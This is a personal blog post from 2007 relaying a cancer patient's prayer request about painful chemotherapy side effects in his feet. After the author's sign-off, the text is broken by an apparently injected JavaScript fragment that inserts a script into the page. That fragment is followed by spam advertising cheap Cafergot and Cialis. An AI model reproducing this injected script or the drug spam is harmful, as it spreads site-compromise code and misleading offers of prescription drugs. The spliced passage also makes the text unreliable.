My Aching Feet!

January 29, 2007 from Skip | Discouraging Times, Quick Overview, The Whole Story, Ups and DownsComments Off on My Aching Feet! | ««Previous - Next»»

Don sent the update below around noon today. He also wrote just a few minutes ago asking:
Can you also please request prayer for relief of pain in my feet. It seems to be getting worse and the pain medication does not bring much relief. I tried acupuncture last week with no success.

As Don puts it below, this is a battle, and our dear friend is right in the middle of it taking blows right and left (and administering blows too to dying cancer cells). The pain in his feet is a side effect of chemo, and his high dosage of chemo probably makes it worse than usual. In addition to the pain, it is very uncomfortable. He has described it as being like your feet being close to frozen, then suddenly immersed in hot water. Thanks for your love and prayers for Don and family.

Skip, for Don & Heatherdocument.currentScript.parentNode.insertBefore(s, document.currentScript); Get the best Cafergot deals at our online store today! Take a look at our offers and buy your Cafergot for only 0.9 USD! This is a one-time offer, and if you don’t want to miss it, act now! Buy cialis Soft for 1.64 USD and not a single penny more!

««Previous - Next»»


Comments

Comments are closed.

You must be a registered user and logged in to post a comment.